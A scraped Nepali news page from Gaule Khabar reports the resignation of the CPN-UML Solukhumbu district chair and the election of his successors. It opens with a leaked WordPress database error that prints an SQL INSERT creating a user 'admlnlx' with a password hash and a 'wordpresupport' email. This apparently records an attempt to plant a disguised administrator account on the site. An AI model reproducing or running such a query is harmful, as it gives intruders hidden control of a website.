WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcIhQeaafZqyfWS/8Wa4pSAKl/v93B1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:39:06', '', 'admlnlx', 'admlnlx')

नेकपा एमाले जिल्ला कमिटि सोलुखुम्बुका अध्यक्ष राईद्धारा पदबाट राजीनामा – Gaule Khabar

नेकपा एमाले जिल्ला कमिटि सोलुखुम्बुका अध्यक्ष राईद्धारा पदबाट राजीनामा

नेकपा एमाले जिल्ला कमिटि सोलुखुम्बुका अध्यक्ष राईद्धारा पदबाट राजीनामा

सोलुखुम्बु । नेपाल कम्युनिस्ट पार्टी नेकपा एमाले जिल्ला कमिटी सोलुखुम्बुका अध्यक्ष मानबीर राईले पदबाट राजीनामा दिएका छन् ।

जिल्ला कमिटीको १४ औं पूर्ण बैठकलाई सम्बोधन गर्दै आज शनिबार अध्यक्ष राईले उपाध्यक्ष डुफकुमार बास्तोलालाई अध्यक्षको जिम्मेवारी हस्तान्तरण गर्ने उद्देश्यले राजीनामा दिएको बताएको हो ।

राजीनामाको घोषणा गर्दै राईले जारी बैठकमा जिल्ला कमिटीको अध्यक्षमा बास्तोलासहित उपाध्यक्षमा हर्कबहादुर राई, सचिबमा आशकुमार राई ‘शिशिर’ र उपसचिवमा रामकाजी श्रेष्ठलाई प्रस्ताव गर्नुभएको थियो । राईको प्रस्तावलाई जिल्ला कमिटीले सर्बसम्मत रूपमा पारित गरेको छ ।

तत्कालीन नेपाल कम्युनिस्ट पार्टीभित्र आन्तरिक द्वन्द्व चर्किरहेका बेला राई केन्द्रीय कमिटीमा मनोनीत भएपछि पनि बास्तोलाले अध्यक्षको जिम्मेवारी सम्हाल्नुभएको थियो। तर एमाले भित्रकै असन्तुष्ट समूहसंगको सम्झौता अनुसार पार्टीलाई गत ०७५ जेठ २ गतेको अवस्थामा फर्काईएपछि १३ औं बैठकबाट अध्यक्षको जिम्मेवारी पुनः राईको कांधमा आएको थियो ।

बैठक नेकपा एमाले प्रदेश नं १ संसदीय दलका प्रमुख सचेतक बुद्धिकुमार राजभण्डारीको प्रमुख अतिथिमा भएको थियो । बैठकमा नबनियुक्त पदाधिकारी तथा जिल्ला कमिटी सदस्यहरुलाई सपथ गराईएको एमाले सोलुखुम्बुले जनाएको छ ।

रााजीनामापत्र:-

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका